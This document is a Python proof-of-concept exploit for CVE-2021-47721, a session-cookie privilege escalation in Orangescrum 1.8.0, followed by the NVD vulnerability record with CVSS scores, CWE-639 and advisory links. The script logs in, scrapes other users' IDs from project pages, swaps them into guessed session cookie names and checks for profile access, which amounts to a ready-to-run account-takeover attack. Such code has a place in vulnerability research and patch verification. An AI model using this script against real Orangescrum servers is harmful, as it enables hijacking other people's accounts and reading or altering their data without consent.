CVE-2021-47721

# CVE-2021-47721 PoC - Orangescrum Session Hijacking # This PoC demonstrates the privilege escalation via session cookie manipulation import requests import re from bs4 import BeautifulSoup TARGET_URL = "http://target-orangescrum-server.com" ATTACKER_EMAIL = "[email protected]" ATTACKER_PASSWORD = "attacker_password" def login(username, password): """Login to Orangescrum and return session cookies""" session = requests.Session() login_url = f"{TARGET_URL}/users/login" data = { "data[User][email]": username, "data[User][password]": password } response = session.post(login_url, data=data) return session if "redirect" in response.url else None def extract_user_ids(session): """Extract user IDs from page source""" project_url = f"{TARGET_URL}/projects" response = session.get(project_url) soup = BeautifulSoup(response.text, 'html.parser') # Look for user IDs in data attributes, hidden inputs, or JavaScript user_ids = [] for element in soup.find_all(attrs={'data-user-id': True}): user_ids.append(element['data-user-id']) # Also check hidden input fields for hidden_input in soup.find_all('input', type='hidden'): if 'user_id' in hidden_input.get('name', '').lower(): user_ids.append(hidden_input.get('value')) return list(set(user_ids)) def hijack_session(original_session, target_user_id): """Hijack target user's session by replacing user ID in cookies""" hijacked_session = requests.Session() # Copy cookies from original session for cookie in original_session.cookies: hijacked_session.cookies.set( cookie.name, cookie.value, domain=cookie.domain, path=cookie.path ) # Find and modify the user ID cookie/session variable # Common session variable names in Orangescrum session_vars = ['user_id', 'Auth', 'CakeCookie[user_id]'] for var in session_vars: if var in hijacked_session.cookies: hijacked_session.cookies.set(var, str(target_user_id)) return hijacked_session def verify_hijack(session): """Verify if session hijacking was successful""" profile_url = f"{TARGET_URL}/users/profile" response = session.get(profile_url) return response.status_code == 200 and "My Profile" in response.text # Main execution attacker_session = login(ATTACKER_EMAIL, ATTACKER_PASSWORD) if attacker_session: victim_ids = extract_user_ids(attacker_session) print(f"Found {len(victim_ids)} potential victim IDs: {victim_ids}") for victim_id in victim_ids: hijacked_session = hijack_session(attacker_session, victim_id) if verify_hijack(hijacked_session): print(f"[!] Successfully hijacked user ID: {victim_id}") else: print(f"[*] Failed to hijack user ID: {victim_id}") else: print("[!] Login failed")

{"cve": {"id": "CVE-2021-47721", "sourceIdentifier": "[email protected]", "published": "2025-12-23T20:15:44.510", "lastModified": "2025-12-31T21:44:19.170", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Orangescrum 1.8.0 contains a privilege escalation vulnerability that allows authenticated users to take over other project-assigned accounts by manipulating session cookies. Attackers can extract the victim's unique ID from the page source and replace their own session cookie to gain unauthorized access to another user's account."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:orangescrum:orangescrum:1.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "0BFFFA2F-2A4C-43C5-8C33-4E74A44AD16E"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50551", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.orangescrum.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/orangescrum-authenticated-privilege-escalation-via-user-session-manipulation", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}